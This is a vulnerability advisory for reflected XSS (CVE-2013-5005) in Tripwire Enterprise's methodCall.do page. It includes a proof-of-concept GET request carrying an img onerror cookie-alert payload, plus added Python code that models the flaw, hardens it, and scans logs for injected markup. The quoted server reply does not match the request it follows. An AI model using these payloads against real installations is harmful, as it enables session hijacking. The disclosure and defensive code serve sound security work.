
ZeroDayLab Advisory - CVE-2013-5005

Author:

Roger Sels (ZeroDayLab Advisories)

Software Version:

Tripwire - Tripwire Enterprise version 8.1 (version 8.1.2.r1697.b180, version as tested); Tripwire Enterprise version 8.2. This has been fixed in version 8.3.

Title:

Reflected XSS vulnerabilities found in Tripwire Enterprise version 8.2 and prior

Criticality:

Low-Medium

Description:

Tripwire Enterprise, a popular commercial security configuration management solution (http://www.tripwire.com/it-security-software/security-configuration-management/), suffers from reflected cross-site scripting issues due to a lack of filtering of inputs to the "methodCall.do" page. The following parameters of the "methodCall.do" page are all vulnerable: m_target_class_name, m_target_method_name and m_request_context_params.
Injecting into the aforementioned parameters will throw an exception (along with an HTTP/403 Forbidden error message from the server). The output of the exception is not sanitised properly and the supplied JavaScript code is executed.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials (hijacking a session and/or elevating their own privileges) and to launch other attacks.
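The following Python model, added here to illustrate the flaw class the advisory describes (it is not Tripwire's code, whose handler is Java and not public), shows the vulnerable pattern beside a hardened one: an unknown target name is echoed verbatim into an error message that is served with a text/html content type, versus the same message HTML-escaped, served as application/json with nosniff, and no longer copied into a response header. The allow-list contents and the Response type are assumptions made for the example.

```python
import html
import json
import re
from dataclasses import dataclass, field


@dataclass
class Response:
    """Minimal stand-in for an HTTP response (assumption for this example)."""
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""


# Hypothetical allow-list of dispatchable targets; the real server's
# registry is not known and this content is constructed for the example.
KNOWN_TARGETS = {
    "com.tripwire.space.ui.web.app.servlet.ajax.AjaxStateMonitor": {"getUserRefreshRate"},
}


def _lookup(params):
    cls = params.get("m_target_class_name", "")
    meth = params.get("m_target_method_name", "")
    found = cls in KNOWN_TARGETS and meth in KNOWN_TARGETS[cls]
    return cls, meth, found


def handle_method_call_vulnerable(params):
    """Reflects the attacker-controlled target name unescaped, as text/html.

    This mirrors the behaviour in the advisory: the exception text carries the
    raw parameter value into both the X-JSON header and a text/html body, so
    a browser renders any markup inside it.
    """
    cls, meth, found = _lookup(params)
    if found:
        return Response(200, {"Content-Type": "application/json"}, json.dumps({"result": "ok"}))
    message = f"Unknown class or target method: '{cls}.{meth}'"
    payload = json.dumps({"AjaxException": {"message": message, "url": "", "reloadPage": False}})
    return Response(
        403,
        {"Content-Type": "text/html;charset=UTF-8", "X-JSON": payload},
        payload,
    )


def handle_method_call_hardened(params):
    """Same error path with output encoding and a non-HTML content type.

    Defence in depth: the value is HTML-escaped before it enters the message,
    the body is declared as JSON (with nosniff so the browser will not guess
    HTML), and untrusted text is kept out of response headers entirely.
    """
    cls, meth, found = _lookup(params)
    if found:
        return Response(200, {"Content-Type": "application/json"}, json.dumps({"result": "ok"}))
    message = (
        "Unknown class or target method: "
        f"'{html.escape(cls, quote=True)}.{html.escape(meth, quote=True)}'"
    )
    payload = json.dumps({"AjaxException": {"message": message, "url": "", "reloadPage": False}})
    return Response(
        403,
        {"Content-Type": "application/json;charset=UTF-8", "X-Content-Type-Options": "nosniff"},
        payload,
    )


_TAG_START = re.compile(r"<[A-Za-z]")


def reflects_unescaped_markup(resp):
    """True if a raw tag opener survives anywhere in the body or header values."""
    haystacks = [resp.body, *resp.headers.values()]
    return any(_TAG_START.search(h) for h in haystacks)


if __name__ == "__main__":
    # Constructed request: a harmless markup probe in the class-name parameter.
    probe = {"m_target_class_name": "com.example.Missing<b>x</b>", "m_target_method_name": "run"}
    print("vulnerable reflects markup:", reflects_unescaped_markup(handle_method_call_vulnerable(probe)))
    print("hardened reflects markup:  ", reflects_unescaped_markup(handle_method_call_hardened(probe)))
```

The decisive change is not the escaping alone: had the original response been served as application/json with nosniff and without mirroring the input into a header, the browser would not have interpreted the echoed text as HTML in the first place. Escaping and a correct content type together close both paths.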

Proof of concept:

The following GET requests will result in the supplied javascript executing:

1. example for the m_target_class_name parameter:

GET /ajaxRequest/methodCall.do?m_arguments=&m_use_xjson_response_header=true&m_convert_result_to_json=true&m_wrap_json_result=result&m_target_class_name=com.tripwire.space.ui.web.app.servlet.ajax.AjaxStateMonitor29e0f%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E628fc67ac743f5bbe&m_target_method_name=getUserRefreshRate&flatten=true&m_IECachePrevention=1372154383033 HTTP/1.1

The server will reply with:

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
X-JSON: {"AjaxException":{"message":"Unknown class or target method: 'com.tripwire.space.ui.web.app.util.preferences.AjaxUserPreferences.setInteger24f68<img src=a onerror=alert(1)>9c8d48f1addae1a86683fe<img src=a onerror=alert(1)>a66367e223d(...)'","url":"","reloadPage":false}}
Content-Type: text/html;charset=UTF-8
Content-Length: 270
Date: Wed, 26 Jun 2013 14:58:48 GMT
Connection: close

{"AjaxException":{"message":"Unknown class or target method: 'com.tripwire.space.ui.web.app.util.preferences.AjaxUserPreferences.setInteger24f68<img src=a onerror=alert(1)>9c8d48f1addae1a86683fe<img src=a onerror=alert(1)>a66367e223d(...)'","url":"","reloadPage":false}}

The above page cannot be reached without valid credentials. An unauthenticated attacker could still abuse this vulnerability to attack authenticated users by preparing maliciously crafted requests and enticing the victim to use them.

Note: The original requests used the POST method; however, it was possible to convert the requests to use the GET method, which makes the attack easier to demonstrate and deliver.
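Because the GET variant leaves the payload in the query string, a web-server access log is enough to spot attempts against the three parameters named above. The following Python scanner is an added example for defenders, not part of the advisory or of Tripwire's product: it parses combined-format log lines, keeps only requests to methodCall.do, fully percent-decodes the watched parameters (so double-encoded values are caught too) and flags any that contain characters a Java class or method name can never contain. The log lines and the 403 correlation it reports are constructed for the example; the regex for the log format is an assumption about a Tomcat/Apache combined log.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters the advisory reports as reflected unescaped into the 403 body.
WATCHED_PARAMS = {"m_target_class_name", "m_target_method_name", "m_request_context_params"}

# Anything outside a dotted Java identifier is suspicious; these tokens in
# particular indicate injected markup or script.
MARKUP_RE = re.compile(r"""[<>"']|\bon\w+\s*=|javascript:""", re.IGNORECASE)

# Combined log format (assumption): ip ident user [ts] "METHOD path proto" status bytes
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)


def fully_decode(value, rounds=3):
    """Peel repeated percent-encoding (%253C -> %3C -> <) up to `rounds` times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(lines):
    """Return one finding per watched parameter whose decoded value carries markup."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a line in the expected format; skip rather than guess
        path = m.group("path")
        if not urlsplit(path).path.endswith("/methodCall.do"):
            continue
        query = parse_qs(urlsplit(path).query, keep_blank_values=True)
        for name, values in query.items():
            if name not in WATCHED_PARAMS:
                continue
            for raw in values:
                decoded = fully_decode(raw)
                if MARKUP_RE.search(decoded):
                    hits.append({
                        "ip": m.group("ip"),
                        "user": m.group("user"),
                        "timestamp": m.group("ts"),
                        "status": int(m.group("status")),
                        "param": name,
                        "value": decoded,
                    })
    return hits


# Constructed sample log: one legitimate call, one markup probe against the
# class-name parameter (answered 403 as in the advisory), one unrelated page.
SAMPLE_LOG = [
    '10.0.0.5 - admin [26/Jun/2013:14:58:48 +0000] "GET /ajaxRequest/methodCall.do'
    '?m_target_class_name=com.tripwire.space.ui.web.app.servlet.ajax.AjaxStateMonitor'
    '&m_target_method_name=getUserRefreshRate HTTP/1.1" 200 512',
    '10.0.0.9 - admin [26/Jun/2013:14:59:02 +0000] "GET /ajaxRequest/methodCall.do'
    '?m_target_class_name=com.example.Missing%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E'
    '&m_target_method_name=run HTTP/1.1" 403 270',
    '10.0.0.9 - - [26/Jun/2013:15:01:10 +0000] "GET /login.do?next=%3Cscript%3E HTTP/1.1" 200 1024',
]


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(f"{hit['timestamp']} {hit['ip']} user={hit['user']} status={hit['status']} "
              f"{hit['param']}={hit['value']!r}")
```

Because a successful reflection on this endpoint is answered with a 403 (see the server reply above), a markup probe in a watched parameter that also produced a 403 is a strong signal; the third sample line is ignored because the scanner is scoped to methodCall.do, which keeps noise from other pages out of this particular rule.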

Fix:

Upgrade to version 8.3 where this issue has now been resolved.

Tags:

XSS, Cross Site Scripting, Poor Filtering